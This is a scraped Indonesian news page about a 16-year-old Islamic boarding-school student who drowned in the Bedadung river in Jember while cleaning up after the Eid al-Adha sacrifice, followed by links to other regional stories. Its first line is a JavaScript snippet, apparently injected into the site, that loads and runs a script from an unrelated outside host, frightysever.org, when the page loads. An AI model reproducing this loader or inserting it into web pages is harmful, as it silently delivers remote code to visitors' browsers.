(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Jawa Timur

Bersihkan Kotoran Kurban di Sungai, Seorang Santri Tewas Tenggelam


KANALKALIMANTAN.COM – Moch Wahyu Nur Atsani, seorang santri asal Kelurahan Wiyung, Kecamatan Wiyung, Kota Surabaya, tewas tenggelam saat Hari Raya Idul Adha.

Wahyu tewas tenggelam di sungai saat sedang membersihkan kotoran kambing kurban.

Peristiwa ini terjadi di Sungai Bedadung Desa Baratan, Kecamatan Patrang, Kabupaten Jember. Saat itu korban membersihkan kotoran kambing di aliran sungai.

Remaja berumur 16 tahun tersebut merupakan santri di Yayasan Pendidikan Anak Yatim Ar Roudhoh, Desa Baratan Kecamatan Patrang.

 

Baca juga  : Makna Berkurban, Guru Hasanuddin: Kecantikan, Ketampanan, Jabatan, Gelar Tak Ada Apa-apanya di Hadapan Allah SWT

Korban jatuh terpeleset ke sungai dan tenggelam di dekat pusaran air. Meskipun berhasil dievakuasi, nyawa korban tidak tertolong. Demikian disampaikan Anggota Regu A Damkar dan Penyelamatan Mako Pemkab Jember, Hary Aksarawan, Minggu (10/7/2022).

“Kami menerima laporan sekitar pukul 9 pagi tadi. Kejadiannya, saat itu korban bersama teman-temannya total 12 orang membersihkan daging kurban di sungai. Jarak dari pondok ke sungai kurang lebih 1 Km,” katanya dikutip dari suarajatimpost.com jejaring media suara.com.

Korban dengan teman-temannya, kata Hary, berbagi tugas untuk membersihkan daging kurban yang disembelih di Hari Raya Idul Adha.

“Korban kebetulan mendapat tugas mengambil bambu dekat (aliran) sungai Bedadung itu. Nah, setelah ambil bambu, badan korban gatal-gatal,” ujarnya menambahkan.

 

Baca juga : Paman Birin Shalat Ied di Masjid Al Karomah Martapura, Serahkan Sapi Seberat 950 Kg dari Presiden RI

“Sebelum melanjutkan membersihkan daging. Korban bermaksud membersihkan diri di sungai. Saat itu, malah diduga jatuh terpeleset dan korban tenggelam,” katanya.

Diduga korban terpeleset jatuh ke sungai yang dekat dengan pusaran air. “Korban terseret arus masuk ke dalam sungai. Kedalaman kurang lebih 3-4 meter. Korban juga kata temannya tidak bisa berenang,” ujarnya.

“Tapi mungkin karena arus air di dekat pusaran air agak kuat. Tidak kuat mengangkat korban dari dalam sungai. Akhirnya kami dari Damkar datang dan melakukan proses evakuasi itu,” ucapnya.

Diketahui ada 8 orang personel anggota Damkar yang menuju lokasi kejadian dan melakukan pertolongan.

 

Baca juga : Gegara Serbuk Kristal, Antar Dua Laki-laki Ini ke Sel Mapolsek Batulicin

“Kami juga berkoordinasi dengan TRC BPBD Jember dan Basarnas. Tapi yang sampai duluan kami. Karena tidak punya alat menyelam dalam air. Kami melakukan evakuasi dengan sangat hati-hati,” ucapnya.

“Alhamdulillah proses evakuasi berhasil, korban berhasil diangkat dari dalam air. Selanjutnya korban kami bawa ke Puskesmas terdekat,” sambungnya.

Namun, karena diduga kehabisan napas akibat tenggelam. Nyawa korban tidak tertolong pada saat di evakuasi.

“Korban meninggal saat perjalanan ke Puskesmas. Terkait proses evakuasi butuh waktu hampir 2 jam,” katanya. (Kanalkalimantan.com/Suara.com)

Editor : kk


Desy Arfianty

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

2 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

4 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

7 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

7 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

9 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

10 jam ago

This website uses cookies.